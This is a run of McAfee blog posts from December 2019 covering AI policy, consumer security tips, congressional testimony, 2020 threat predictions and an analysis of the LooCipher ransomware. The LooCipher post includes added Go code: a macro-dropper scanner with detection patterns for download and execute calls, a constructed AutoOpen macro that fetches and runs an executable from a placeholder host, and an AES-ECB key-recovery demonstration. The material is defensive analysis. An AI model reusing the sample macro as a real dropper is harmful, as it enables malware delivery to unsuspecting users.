The Forrester Wave™ evaluation highlights Leaders, Strong Performers, Contenders, and Challengers. It is an assessment of the top vendors in the market and does not represent the entire vendor landscape. From a vendor perspective, the amount of time and resources Forrester spends to evaluate vendors is significant. The process is designed to cut through marketing hype and validate every vendor claim in much the same way a large enterprise might evaluate solutions. In some ways, Forrester’s evaluation is even more rigorous than the typical IT procurement process.

McAfee CWS enables users to quickly and easily discover, visualize, protect, and simplify security management across all IT (physical, virtual, and public, private and hybrid cloud environments). Learn how McAfee Cloud Workload Security can help you reduce complexity, accelerate response times, maximize investments and accelerate business success.

Learn more about McAfee Cloud Workload Security, and download your complimentary copy here.

The post Independent Research Firm Ranks CWS Vendors in Report: McAfee a Leader appeared first on McAfee Blogs.

Cybersecurity & Artificial Intelligence (AI) – a view from the EU Rear Window, Part II https://www.mcafee.com/blogs/enterprise/data-security/cybersecurity-artificial-intelligence-ai-a-view-from-the-eu-rear-window-part-ii/ https://www.mcafee.com/blogs/enterprise/data-security/cybersecurity-artificial-intelligence-ai-a-view-from-the-eu-rear-window-part-ii/#respond Mon, 09 Dec 2019 16:00:14 +0000 /blogs/?p=97669

In Part I of this blog, we discussed the debate around AI: what it is, whether it exists, and to what extent it plays a role in our daily lives. In Part II, we turn our focus to the future, and how AI must be developed deliberately and thoughtfully to provide the greatest benefit to humanity.

A strategic, economic and political challenge

There is absolutely no doubt that AI is a strategic, economic and political issue. On Feb. 12, 2019, the European Parliament adopted a comprehensive European industrial policy on AI and robotics. The motion notes that AI promotes innovation, productivity, economic growth and competitiveness; reshapes multiple industrial sectors; and can help address global challenges such as health or the environment. The goal of the Parliament is to facilitate the development of AI technologies by implementing a single European market for AI and removing barriers to the deployment of AI, including through the principle of mutual recognition with regard to the cross-border use of smart products. Clearly, the goal is to allow the European Union to compete with the massive investments made by third parties, especially the United States and China.

On top of this, it recommends creating a European Regulatory Agency for AI and Algorithmic Decision Making.

A strong initiative to integrate ethics in AI

The Motion highlights the importance of deploying a “trusted AI” coupled with ethical principles to enable responsible competitiveness as it will build user trust and facilitate wider adoption of AI. Parliament believes that the European Union must play a “leading role on the international stage” by establishing itself as a leader for an ethical, safe and advanced AI.

The reason the main actors want ethics integrated into AI is the need to guarantee, from the design stage, the transparency and explainability of the algorithms, in order to prevent any discrimination linked to automated decision-making. This concern is echoed by Article 22 of EU Regulation 2016/679 (the “GDPR”): “The data subject shall have the right not to be subject to a decision based solely on automated processing, including profiling, which produces legal effects concerning him or her or similarly significantly affects him or her.”

AI is to be designed as a tool that helps and is controlled by humans aligned on fundamental rights such as dignity, autonomy, self-determination and non-discrimination. The European Commission published draft guidelines on ethics in the field of AI on December 18, 2018.

A Legal Framework for AI

The Motion stresses the need to develop a strategic regulatory environment for AI and robotics that encourages both technological innovation and strong user protection. Parliament refers to Europe’s ambition to be a pioneer in this area, hence the importance of “regularly reassessing existing legislation in order to ensure that it is appropriate to its objective as far as Europe is concerned.”

The first issue raised by the Parliament is the need to reconcile the GDPR with the development of AI. The key to developing AI is the trust of its users, and there can be no trust from users if their personal data is not strongly protected. The EU Parliament argues that “the establishment of an ecosystem of trust in the development of AI technologies should be based on an appropriate data processing framework,” which implies full respect for the EU legal framework concerning the protection of personal data, i.e., the GDPR.

The resolution also stresses the lack of specific provisions on liability and intellectual property, which undermines legal certainty. Liability in the field of AI clearly remains a grey area.

What about AI in the field of Cybersecurity?

The European Parliament highlights that “AI can both be a threat to cybersecurity and the main tool against cyber-attacks.” There is a need to ensure the integrity of the data and algorithms on which the AI is based, including “product safety checks by market surveillance authorities and consumer protection rules that implement place, with appropriate minimum safety standards.” Simultaneously, the Motion recognizes that “the deployment of solutions integrating AI for cybersecurity purposes will make it possible to predict threats, prevent them and mitigate.”

The Parliament stresses again the importance of developing its own cybersecurity independence by developing “its own infrastructure, data centers and systems of cloud computing and its own computer components.” Some even view it as a founding element of European numerical sovereignty.

Ultimately, AI may become the next big privacy trend. Just as big data made every single company a data company, many believe that the new era of AI will transform every company into an AI company. When thinking about AI, the first thing that pops into people’s mind are autonomous vehicles and smart robots, but the legal and privacy implications are far wider, potentially impacting every single industry, from consumer goods to healthcare to financial services—without forgetting, of course, cybersecurity.

I bet that the next thing you know, we will have an official EU Commission position on the legitimate interest in processing personal data for the sake of AI in the field of cybersecurity. And hopefully ethics, recognized at the international level, will provide the required boundaries for a safe and transparent use of AI.

The post Cybersecurity & Artificial Intelligence (AI) – a view from the EU Rear Window, Part II appeared first on McAfee Blogs.

7 Tips to Make Sure Your Smartphone Use Doesn’t Ruin Holiday Gatherings https://www.mcafee.com/blogs/consumer/family-safety/tips-to-make-sure-smartphone-use-doesnt-ruin-holiday-gatherings/ https://www.mcafee.com/blogs/consumer/family-safety/tips-to-make-sure-smartphone-use-doesnt-ruin-holiday-gatherings/#respond Sat, 07 Dec 2019 15:00:07 +0000 /blogs/?p=97745

The gravy wasn’t the only thing steaming at the Thanksgiving table this year. Grandma wasn’t happy. It turns out that those shapes that looked like socks draped over the living room furniture were actually teenagers glued to their smartphones — teenagers Grandma had repeatedly asked to set the table.

And if you knew Grandma, you knew that she just wasn’t having it.

After a very awkward silence fell across our 20-person table, Grandma gave an impassioned speech on how smartphones are destroying the family connection and turning our kids into zombies. A lively discussion ensued and three generations defended their use (or non-use) of technology.

It’s a conversation, no doubt, that lights up countless dinner tables every day.

When the dust settled, it was Grandma’s wisdom that stuck. Here are the highlights:

  • There’s a time and a place for everything, but we’ve lost sight of that.
  • Giving people your undivided attention says, “you matter.”
  • Phones have become center stage, not people, not experiences, not manners.
  • How we spend our time is how we spend our lives.
  • We can’t get back the hours, days, and years we spend online.

Grandma’s sentiments must have hit a nerve even with the teenagers. The next day phones were scarce. The conversation lingered, sometimes for hours. The laughter was ever-present. What we coined “Grandma’s turkey day tantrum” added a rich layer of genuine connection to our gathering.

Chances are you can relate to this story in some way. That’s because Grandma is onto something. Studies show technology is taking center stage for a lot of us.

So how does your smartphone use measure up? What tech habits are negatively affecting your relationships, your health, or your attitude? What steps can you take to change them?

7 tech tips to help save your holiday

Discuss expectations ahead of time. Have a short but specific family huddle to discuss when and where devices are allowed. Technology isn’t bad — issues arise with our personal choices in the way we use technology. Establish no-phone zones and be sure adults follow the rules as well.

No more phubbing. Phubbing is snubbing the person in front of you to carry on a text conversation on your phone. Make eye contact with the person in front of you. Leave your phone in another room or turn it face down to avoid the temptation of phubbing people over the holidays.

Listen. Learn. Like. Devices are magnetic because there are endless things to look at and engage with right at our fingertips. But try this: Turn your phone off and take in the picture and the people right in front of you. There’s a story behind every face, endless things to learn, and common ground to discover in your circle of family and friends. Be the person in the room asking more in-depth questions, listening intently, and giving people your thumbs ups and “likes” IRL (in real life).

Ask before posting (especially teens). They may not vocalize it but you can bet the teenager in the room is cringing inside when you get waaaay too excited about posting a selfie with them online. That’s because they are very, very picky with the pictures they choose to post because each one impacts how they come across to their peers online. Be sure to ask parents of younger kids before you post their picture online — it can be a bigger deal than you think.

Resist tech shaming. Family gatherings can include multiple generations that hold different opinions and perspectives about technology. To keep the peace (and avoid upsetting grandma), be sure to respect differing opinions and behaviors around technology. Be careful no one is made to feel shame for his or her tech habits.

Pay attention to emotions. Just as stressful situations can trigger overeating, certain feelings can prompt us to turn to our devices in lieu of engaging with the people around us. A recent study reveals that most people could barely last four hours with family before needing a break. Instead of turning to tech to escape, consider replacing that impulse with something else. Go for a walk, get a workout in, call a friend, or take a nap.

Check-in with teens. The holidays can amplify pressure for teens to make their holiday appear “picture perfect” online. If you notice moodiness or anxiety, spend some extra time with your child. Be aware that comparing his or her looks, material possessions, and unique experiences may be affecting your child’s mood. Help your child be present in the moment rather than creating moments to post online.

The most wonderful time of the year can also be the most complicated, especially when technology is added to the mix. But remember, technology can’t ruin a holiday; only our choices can. Here’s wishing you a very merry holiday filled with hours of genuine connection with the ones you love.

The post 7 Tips to Make Sure Your Smartphone Use Doesn’t Ruin Holiday Gatherings appeared first on McAfee Blogs.

Attention Android Users: Is CallerSpy Malware Spying on You? https://www.mcafee.com/blogs/consumer/consumer-threat-notices/android-callerspy-malware/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/android-callerspy-malware/#comments Fri, 06 Dec 2019 23:02:12 +0000 /blogs/?p=97767

Meet CallerSpy malware, a new form of mobile malware designed to snoop on calls, texts, and other smartphone communications. This trojan malware is targeting Android users by tricking them into downloading a fake chat app called Apex App. However, despite being advertised as a chat application, CallerSpy doesn’t really contain any chat capabilities. In fact, researchers describe the app as “riddled with espionage features.”

How exactly does this spy begin its reconnaissance mission? According to ZDNet, once the fake app is downloaded and launched, it connects to a server that directs the malware to start snooping on the device. From collecting call logs, text messages, contacts, and device files to being able to activate the phone’s microphone and taking screenshots, CallerSpy does it all. Once this data has been stolen, it’s then periodically uploaded to the cybercrook. And since cybersecurity researchers have only recently uncovered this malware, it is still unknown what this stolen data is being used for. What’s clear is that CallerSpy is no misnomer and users need to be prepared.

So, what are some proactive steps users can take to avoid being spied on by CallerSpy? Follow these tips to avoid this malware’s prying eye:

  • Watch what you download. The best way to know if an app is malicious or not is to check for typos and grammatical errors in the description, look at the download statistics, and read what other users are saying.
  • Be selective about which sites you visit. Only use reputable, well-known, and trusted sites. One way to determine if a site is potentially malicious is by checking its URL. If the URL address contains multiple grammar or spelling errors and suspicious characters, avoid interacting with the site altogether.
  • Surf the web securely. You can use a tool like McAfee WebAdvisor, which will flag sites that may be malicious without you knowing. The best part: it’s free!

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Attention Android Users: Is CallerSpy Malware Spying on You? appeared first on McAfee Blogs.

Cloud Security and Artificial Intelligence in the Financial Sector https://www.mcafee.com/blogs/other-blogs/executive-perspectives/cloud-security-and-artificial-intelligence-in-the-financial-sector/ https://www.mcafee.com/blogs/other-blogs/executive-perspectives/cloud-security-and-artificial-intelligence-in-the-financial-sector/#respond Thu, 05 Dec 2019 16:00:13 +0000 /blogs/?p=97672

I recently had the honor of testifying before the House Financial Services Committee’s Taskforce on Artificial Intelligence about two critical emerging issues in the financial services sector – cloud and artificial intelligence (AI). Both have incredible potential for energizing the financial sector, but they also raise important security concerns.

Financial services organizations are migrating to the cloud to reduce complexity, cut costs, and focus their capabilities on delivering financial services to their customers. Leveraging the cloud, both large and small institutions benefit from advanced technology that is normally only available to those who can substantially invest in a highly technical workforce.

While cloud providers generally practice strong cyber hygiene, enabling quick responses to vulnerabilities and security incidents, there are also major security challenges with moving to the cloud.

Because cloud providers service many clients, a single breach can place multiple organizations’ data at risk. Today, almost all organizations, including financial services, use multiple cloud providers, a trend that is making visibility into operations more challenging. To remediate this situation, organizations need solutions to manage visibility and monitor security between cloud service consumers and providers. Services like McAfee’s MVISION Cloud, a Cloud Access Security Broker (CASB), represent a critical new class of applications that are rapidly being adopted to manage and secure diverse cloud environments.

As with cloud, we must also understand the capabilities, limitations, and risks of AI. Financial services organizations are using AI and machine learning to enable advanced analytics that allows them to better serve and protect customers, while better managing overall cost.

As the new foundation for cyber defense, AI is enabling us to better detect threats and find the so-called “needle in a haystack of needles.” Additionally, AI-based automation is helping alleviate the cybersecurity talent shortage, enabling us to free up human security professionals to focus on the most critical aspects of cyber defense.

Unfortunately, AI can be used by our adversaries. Bad actors can use AI to identify the most vulnerable victims, automate phishing, and evade detection. AI improves their ability to execute attacks and enables content creation for use in social engineering and information warfare, such as deepfake videos. These and many other adversarial uses of AI can and will occur, putting our financial services sector as well as our democracy and civil society at risk.

To properly secure cloud and AI technology in the financial services sector, I recommended the Taskforce consider voluntary collaboration and the use of industry-supported standards and best practices such as the NIST Cybersecurity Framework. When appropriate, existing cybersecurity rules for highly regulated critical infrastructure industries should be updated to reflect the rapid speed of innovation.

While innovations in both cloud and artificial intelligence are and will continue to enhance the cybersecurity of the financial services and cloud sectors, these same innovations will progressively enable cyber hackers.

At McAfee, we look forward to working with Congress to help provide cybersecurity advice as the industry moves towards the adoption of cloud and artificial intelligence technologies.

A transcript of my testimony on the U.S. House Financial Services Committee’s Taskforce on Artificial Intelligence can be found here.

The post Cloud Security and Artificial Intelligence in the Financial Sector appeared first on McAfee Blogs.

Analysis of LooCipher, a New Ransomware Family Observed This Year https://www.mcafee.com/blogs/other-blogs/mcafee-labs/analysis-of-loocipher-a-new-ransomware-family-observed-this-year/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/analysis-of-loocipher-a-new-ransomware-family-observed-this-year/#respond Thu, 05 Dec 2019 15:00:19 +0000 /blogs/?p=97708

Initial Discovery

This year seems to again be the year for ransomware. Notorious attacks were made using ransomware and new families are being detected almost on a weekly basis.

The McAfee ATR team has now analyzed a new ransomware family with some special features we would like to showcase. LooCipher shows how a new actor, still at an early stage of development, reused the same distribution techniques as other players in the ransomware landscape. The design of the ransom note reminded us of the old days of Cerber ransomware: a layout built to pressure the victim into paying.

Thanks to initiatives like the ‘No More Ransom’ project, one of the partners involved has already provided a valid decryptor to restore files encrypted by LooCipher.

McAfee Telemetry

Based on our telemetry, we detected LooCipher infections in the following regions:

Campaign Analysis:

Based on the analysis we performed, this ransomware was delivered through a DOC file. The content and techniques used with this MalDoc are quite simple compared to other doc files used to spread malware, such as Emotet. No special social engineering techniques were applied; the authors only put a simple message on it – “Enable macros”.

The document is set up to download LooCipher from a remote server as soon as it is opened. The Sub AutoOpen function is visible as a macro in the document:
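Added here as an illustration of how to triage a document of this kind (this is not McAfee's tooling or the LooCipher document's macro), the following Go program scans VBA source for the three capabilities a macro dropper needs, an auto-exec entry point such as AutoOpen, a download primitive and an execution primitive, and returns a verdict. The macro text is a constructed stand-in with a placeholder URL and no Declare statements, so it only serves to exercise the scanner.

```go
package main

import (
	"fmt"
	"regexp"
	"sort"
)

// Hit is one heuristic match in a VBA module: the capability it indicates and the keyword seen.
type Hit struct {
	Capability string
	Keyword    string
}

// Capability patterns. Auto-exec procedures run as soon as the user clicks
// "Enable Content", which is exactly what the LooCipher document asked for.
var capabilities = map[string]*regexp.Regexp{
	"autoexec": regexp.MustCompile(`(?i)\b(?:Sub|Function)\s+(AutoOpen|Document_Open|AutoExec|Workbook_Open)\b`),
	"download": regexp.MustCompile(`(?i)\b(URLDownloadToFile|XMLHTTP|WinHttpRequest|InternetOpenUrl)\b`),
	"execute":  regexp.MustCompile(`(?i)\b(Shell|ShellExecute|WScript\.Shell|CreateProcess)\b`),
	"url":      regexp.MustCompile(`(?i)\b(h(?:xx|tt)ps?://[^\s"']+)`),
}

// scanMacro returns every indicator found in one module's VBA source, sorted so
// that the output is stable regardless of map iteration order.
func scanMacro(src string) []Hit {
	var hits []Hit
	for name, re := range capabilities {
		for _, m := range re.FindAllStringSubmatch(src, -1) {
			hits = append(hits, Hit{Capability: name, Keyword: m[1]})
		}
	}
	sort.Slice(hits, func(i, j int) bool {
		if hits[i].Capability != hits[j].Capability {
			return hits[i].Capability < hits[j].Capability
		}
		return hits[i].Keyword < hits[j].Keyword
	})
	return hits
}

// verdict condenses the hits: a module that runs automatically, fetches
// something and executes it has the full dropper shape described in the post.
func verdict(hits []Hit) string {
	have := map[string]bool{}
	for _, h := range hits {
		have[h.Capability] = true
	}
	switch {
	case have["autoexec"] && have["download"] && have["execute"]:
		return "dropper"
	case have["autoexec"] && (have["download"] || have["execute"]):
		return "suspicious"
	case len(hits) > 0:
		return "review"
	}
	return "clean"
}

// Constructed sample in the shape of a download-and-run AutoOpen macro; it is
// not the real LooCipher macro and the URL is a placeholder.
const sampleMacro = `' constructed sample, not real malware
Sub AutoOpen()
    Dim exe As String
    exe = Environ("TEMP") & "\update.exe"
    URLDownloadToFile 0, "hxxp://placeholder.invalid/update.exe", exe, 0, 0
    Shell exe, vbHide
End Sub`

// Constructed benign macro for comparison.
const benignMacro = `Sub FormatTable()
    Selection.Font.Bold = True
End Sub`

func main() {
	for _, src := range []string{sampleMacro, benignMacro} {
		hits := scanMacro(src)
		for _, h := range hits {
			fmt.Printf("%-9s %s\n", h.Capability, h.Keyword)
		}
		fmt.Println("verdict:", verdict(hits))
	}
}
```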

LooCipher starts its encryption routine by building a 16-byte block from a predefined set of characters and the local system time:

The ransomware encrypts with AES in ECB mode, and the same key is used for every file, which simplifies the file recovery process. Other ransomware families use a different key for each file so that a brute-force attack cannot discover a single key that unlocks the whole infection.
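The following Go program, added here as an illustration and not taken from the LooCipher binary or from McAfee's tooling, shows why the design described above makes recovery feasible: with AES in ECB mode every identical plaintext block yields an identical ciphertext block, so encrypted files leak structure, and because one key serves every file, recovering that single key (from the binary, or from the C2 traffic discussed later in the post) decrypts all of them. The key and the file contents are constructed sample values.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"errors"
	"fmt"
)

// pkcs7Pad pads data to a whole number of AES blocks (always adds at least one byte).
func pkcs7Pad(data []byte) []byte {
	n := aes.BlockSize - len(data)%aes.BlockSize
	return append(append([]byte{}, data...), bytes.Repeat([]byte{byte(n)}, n)...)
}

// pkcs7Unpad strips the padding added by pkcs7Pad, rejecting malformed input.
func pkcs7Unpad(data []byte) ([]byte, error) {
	if len(data) == 0 || len(data)%aes.BlockSize != 0 {
		return nil, errors.New("length is not a multiple of the block size")
	}
	n := int(data[len(data)-1])
	if n == 0 || n > aes.BlockSize || n > len(data) {
		return nil, errors.New("bad padding")
	}
	for _, b := range data[len(data)-n:] {
		if int(b) != n {
			return nil, errors.New("bad padding")
		}
	}
	return data[:len(data)-n], nil
}

// ecbEncrypt encrypts block by block with no chaining: equal plaintext blocks
// always give equal ciphertext blocks, which is the core weakness of ECB.
func ecbEncrypt(key, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	padded := pkcs7Pad(plaintext)
	out := make([]byte, len(padded))
	for i := 0; i < len(padded); i += aes.BlockSize {
		block.Encrypt(out[i:i+aes.BlockSize], padded[i:i+aes.BlockSize])
	}
	return out, nil
}

// ecbDecrypt reverses ecbEncrypt. Because LooCipher reuses one key for every
// file, a single recovered key is enough to decrypt all of them.
func ecbDecrypt(key, ciphertext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	if len(ciphertext)%aes.BlockSize != 0 {
		return nil, errors.New("ciphertext length is not a multiple of the block size")
	}
	out := make([]byte, len(ciphertext))
	for i := 0; i < len(ciphertext); i += aes.BlockSize {
		block.Decrypt(out[i:i+aes.BlockSize], ciphertext[i:i+aes.BlockSize])
	}
	return pkcs7Unpad(out)
}

// repeatedBlocks counts ciphertext blocks that occur more than once. A non-zero
// count in supposedly random-looking data is a strong hint that ECB was used.
func repeatedBlocks(ciphertext []byte) int {
	seen := make(map[string]int)
	for i := 0; i+aes.BlockSize <= len(ciphertext); i += aes.BlockSize {
		seen[string(ciphertext[i:i+aes.BlockSize])]++
	}
	repeats := 0
	for _, c := range seen {
		if c > 1 {
			repeats += c - 1
		}
	}
	return repeats
}

func main() {
	// Constructed stand-in for the key LooCipher derives from its character set
	// and the system time; in practice it would come from analysis of the binary
	// or from a capture of the traffic to the C2 server.
	key := []byte("cHaRsEt-TiMe-KeY")
	invoices := bytes.Repeat([]byte("INVOICE-TEMPLATE"), 3) // repeated 16-byte records
	payroll := []byte("employee=alice;salary=constructed")

	ctInvoices, _ := ecbEncrypt(key, invoices)
	ctPayroll, _ := ecbEncrypt(key, payroll)
	fmt.Printf("repeated blocks in encrypted invoices: %d (ECB leaks structure)\n", repeatedBlocks(ctInvoices))

	// One key recovers every file the sample encrypted.
	for _, ct := range [][]byte{ctInvoices, ctPayroll} {
		pt, err := ecbDecrypt(key, ct)
		fmt.Printf("decrypt ok=%v: %q\n", err == nil, pt)
	}
}
```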

During encryption, the ransomware skips three special system folders so as not to break their functionality.

Encrypting key files and folders was one of the mistakes we highlighted in our analysis of LockerGoga; that ransomware completely broke the functionality of the system. Some of the binaries we found encrypted the entire system, including the LockerGoga binary itself.

Regarding the extensions that LooCipher will search and encrypt in the system, the list is hardcoded inside the binary:

It is quite interesting to see how LooCipher searches for extensions that do not occur on Windows systems, such as “.dmg”. This suggests that the authors may simply have taken extension lists from code-sharing sites.

In the analysis we found a PDB reference:

\\Users\\Usuario\\Documents\\Proyectos\\sher.lock\\Debug\\LooCipher.pdb

It is interesting to note that the reference contains Spanish words, as if the developer used folders named in Spanish; however, the system is configured in English. We currently have no explanation for this, but it is curious.

BTC payment is the method the LooCipher authors chose to collect money from their victims. Once file encryption is complete, the ransomware shows a ransom note to the user:

The LooCipher decryptor window also pops up on the system, with a countdown:

In the ransom note LooCipher says the BTC address is specifically generated for the user but that is not true; all the BTC addresses we have seen are hardcoded in the binary:

This is another unusual characteristic of this ransomware. Normally the workflow provides an email address to contact the authors so they can send instructions to the victim, or at least a BTC address for payment (when a unique BTC address is not generated for every victim); this is the main difference between RaaS and one-shot campaigns.

Static analysis of the binaries we have shows that the same bundle of BTC addresses is included in most of the samples we spotted in the wild:

None of the BTC addresses found regarding LooCipher showed any transactions so we believe the authors did not monetize the campaign with the binaries we analyzed.

LooCipher and Network Traffic:

In the encryption process, LooCipher will contact the C2 server and send information about the victim:

The data sent to the server is:

A capture of this network traffic could therefore let the victim learn the encryption key that was used.

Decryptor Fallback Mechanism Implemented by LooCipher

The LooCipher authors provide a fallback mechanism to help victims access the instructions and the decryptor again, in case they close the LooCipher window when it appears in the system after encrypting the files:

The mechanism is a copy of the LooCipher binary uploaded to the Mega platform. A victim who wants to retrieve the BTC address, or decrypt the files after making the payment, can download and run this binary. According to the ransomware’s authors, files already encrypted by LooCipher will not be encrypted again.

I’m Infected by LooCipher. How Can I Get my Files Back?

McAfee is one of the founders and contributors of the ‘No More Ransom’ project. One of our fellow stakeholders created a decryptor for all the files encrypted by LooCipher:

So, if you are infected with LooCipher, it is possible to get your files back.

Conclusions:

The LooCipher authors are not a sophisticated actor compared with those behind families like Ryuk, LockerGoga or REvil. They tried to spread their ransomware by combining the infection with an Office file carrying a simple macro.

It will be impossible for the authors to come back to the scene if they do not change how the ransomware works.

The McAfee ATR Team advises against paying the ransomware demands and, instead, recommends:

  • Saving a copy of your encrypted files – a decryptor may be released in the future
  • Having a solid backup workflow in the company
  • Implementing best practices in terms of Cybersecurity

YARA Rule

We uploaded a YARA rule to detect almost all the samples observed in the wild.

MITRE ATT&CK Coverage:

  • Hooking
  • Defense Evasion
  • Network Service Scanning
  • System Information Discovery
  • Data Compressed

McAfee Coverage:

  • Artemis!02ACC0BC1446
  • Artemis!12AA5517CB7C
  • Artemis!1B1335F20CD0
  • Artemis!362AB3B56F40
  • Artemis!64FCC1942288
  • Artemis!8F421FE340E7
  • Artemis!983EF1609696
  • Artemis!A11724DBE1D6
  • Artemis!A7ABF760411F
  • Artemis!B9246AA9B474
  • Artemis!F0D98A6809C1
  • McAfee-Ransom-O
  • Ransomware-GNY!3B9A8D299B2A
  • Ransomware-GNY!66571E3C8036
  • Ransomware-GNY!9CF3C9E4A9B5
  • Ransomware-GNY!A0609D7AD404
  • Ransomware-GNY!A77FDEFE40BE
  • Ransomware-GNY!A9B6521FF980
  • Ransomware-GNY!D3CE02AD4D75
  • Ransomware-GNY!DC645F572D1F
  • RDN/Generic Downloader.x
  • RDN/Generic.ole

IOCs


The post Analysis of LooCipher, a New Ransomware Family Observed This Year appeared first on McAfee Blogs.

Here’s What You Need to Know About Your Data Privacy in 2020 https://www.mcafee.com/blogs/consumer/consumer-threat-notices/data-privacy-predictions-2020/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/data-privacy-predictions-2020/#respond Thu, 05 Dec 2019 05:01:51 +0000 /blogs/?p=97731


The end of 2019 is rapidly approaching, and with the coming of a new year comes the perfect opportunity to reflect on the past and plan for the months ahead. What will 2020 bring when it comes to cybersecurity and what can users do to ensure that they’re protected in the upcoming year? From new data privacy laws to how organizations collect and store user data, the new year will certainly bring plenty of security implications for users. Let’s take a look at a few predictions we have for the year to come.

More Awareness, More Regulations

After a security breach is disclosed, users often learn what can go wrong with their data and may start to wonder what will happen if their information gets into the wrong hands. That’s why new privacy laws will likely be implemented to empower users to better protect and control their data. For example, the new California privacy law set to go into effect January 2020 will allow consumers to instruct companies to delete their personal information and to opt-out of having their private data shared. These new regulations will allow users to better control their data and who has access to it. However, more regulations also create a more complicated landscape for individuals to navigate. Consumers will likely see more “consent” requests attached to any online data collection. That said, it is important to pay close attention to what consumers are agreeing to when they click “consent.”

With these new privacy laws, the method and level of transparency that organizations use to collect and store user data will likely come under scrutiny, particularly as data breaches become public. For example, companies make billions of dollars annually by buying and selling personal information that isn’t theirs to sell. The more data a company has on a user, the more insight cybercriminals have to infiltrate their digital life and trick them into sharing more information. 

New Tricks for the New Year

As more data is collected from various breaches, cybercriminals will look to leverage this information as a way to better understand which users to target and how exactly to target them. With the help of social engineering and artificial intelligence, these crooks will up the ante and turn old cyber tricks into sophisticated, unfamiliar threats. Take call spoofing, for example. By taking advantage of a user’s private data and new technology, cybercriminals could implement a fake call that appears to be coming from the user’s friend or family member. Because users are more likely to pick up a call from someone they know or a number that shares their same area code, cybercriminals increase the chances that their malicious attacks will be successful.

Dark Web Draws in More Data

With the number of breached records growing every day, users need to be aware of how crooks are leveraging this information in the cybercriminal underground and on the Dark Web. According to the McAfee Advanced Threat Research (ATR) team, more than 2.2 billion stolen account credentials were made available on the cybercriminal underground throughout Q1 2019 alone. This growing trend of personal online accounts being brokered on the Dark Web and the increasingly sophisticated threats that have recently emerged means that the 2019 holiday season could be the most dangerous yet.

With these predictions for the cybersecurity landscape in 2020, what resolutions can users make to help ensure that their data is protected? Follow these security tips to help safeguard your personal information:

  • Never reuse passwords. With just one hack, cybercriminals can get their hands on thousands of passwords, which they can then use to try to access multiple accounts. Ensure that all of your passwords are complex and unique.
  • Go directly to the source. Instead of clicking on a link in an email, it’s always best to check directly with the source to verify an offer or shipment.
  • Browse with security protection. Use a comprehensive security solution, like McAfee Total Protection, which can help protect devices against malware, phishing attacks, and other threats. It includes McAfee WebAdvisor, which can help identify malicious websites.
  • Use a tool to help protect your personal information. A solution like McAfee Identity Theft Protection takes a proactive approach to help protect identities with personal and financial monitoring and recovery tools to help keep identities personal and secure.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Here’s What You Need to Know About Your Data Privacy in 2020 appeared first on McAfee Blogs.

McAfee Labs 2020 Threats Predictions Report https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-labs-2020-threats-predictions-report/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-labs-2020-threats-predictions-report/#respond Thu, 05 Dec 2019 05:01:14 +0000 /blogs/?p=97660


With 2019’s headlines of ransomware, malware, and RDP attacks almost behind us, we shift our focus to the cybercrime threats ahead. Cybercriminals are increasing the complexity and volume of their attacks and campaigns, always looking for ways to stay one step ahead of cybersecurity practices – and more often using the world’s evolving technology against us.

Continuing advancements in artificial intelligence and machine learning have led to invaluable technological gains, but threat actors are also learning to leverage AI and ML in increasingly sinister ways. AI technology has extended the capabilities of producing convincing deepfake video to a less-skilled class of threat actor attempting to manipulate individual and public opinion. AI-driven facial recognition, a growing security asset, is also being used to produce deepfake media capable of fooling humans and machines.

Our researchers also foresee more threat actors targeting corporate networks to exfiltrate corporate information in two-stage ransomware campaigns.

With more and more enterprises adopting cloud services to accelerate their business and promote collaboration, the need for cloud security is greater than ever. As a result, the number of organizations prioritizing the adoption of container technologies will likely continue to increase in 2020. Which products will they rely on to help reduce container-related risk and accelerate DevSecOps?

The increased adoption of robotic process automation, and the growing importance of securing the system accounts used for automation, raise security concerns tied to Application Programming Interfaces (APIs) and the wealth of personal data they expose.

The threatscape of 2020 and beyond promises to be interesting for the cybersecurity community.

–Raj Samani, Chief Scientist and McAfee Fellow, Advanced Threat Research

Twitter @Raj_Samani

Predictions

Broader Deepfakes Capabilities for Less-Skilled Threat Actors

Adversaries to Generate Deepfakes to Bypass Facial Recognition

Ransomware Attacks to Morph into Two-Stage Extortion Campaigns

Application Programming Interfaces (API) Will be Exposed as The Weakest Link Leading to Cloud-Native Threats

DevSecOps Will Rise to Prominence as Growth in Containerized Workloads Causes Security Controls to ‘Shift Left’

Broader Deepfakes Capabilities for Less-skilled Threat Actors

By Steve Grobman

The ability to create manipulated content is not new. Manipulated images were used as far back as World War II in campaigns designed to make people believe things that weren’t true. What’s changed with the advances in artificial intelligence is that you can now build a very convincing deepfake without being an expert in technology. There are websites where you can upload a video and receive a deepfake video in return. Very compelling capabilities in the public domain can deliver both deepfake audio and video to hundreds of thousands of potential threat actors with the skills to create persuasive phony content.

Deepfake video or text can be weaponized to enhance information warfare. Freely available video of public comments can be used to train a machine-learning model that can develop a deepfake video depicting one person’s words coming out of another’s mouth. Attackers can now create automated, targeted content to increase the probability that an individual or groups fall for a campaign. In this way, AI and machine learning can be combined to create massive chaos.

In general, adversaries are going to use the best technology to accomplish their goals, so if we think about nation-state actors attempting to manipulate an election, using deepfake video to manipulate an audience makes a lot of sense. Adversaries will try to create wedges and divides in society. A cybercriminal could also have a CEO appear to make a compelling statement that the company missed earnings, or that there is a fatal flaw in a product that will require a massive recall. Such a video can be distributed to manipulate a stock price or enable other financial crimes.

We predict that the ability of an untrained class of actors to create deepfakes will drive an increase in the quantity of misinformation.

Adversaries to Generate Deepfakes to Bypass Facial Recognition

By Steve Povolny

Computer-based facial recognition, in its earliest forms, has been around since the mid-1960s. While dramatic changes have since taken place, the underlying concept remains: it provides a means for a computer to identify or verify a face. There are many use cases for the technology, most related to authentication and to answer a single question: is this person who they claim to be?

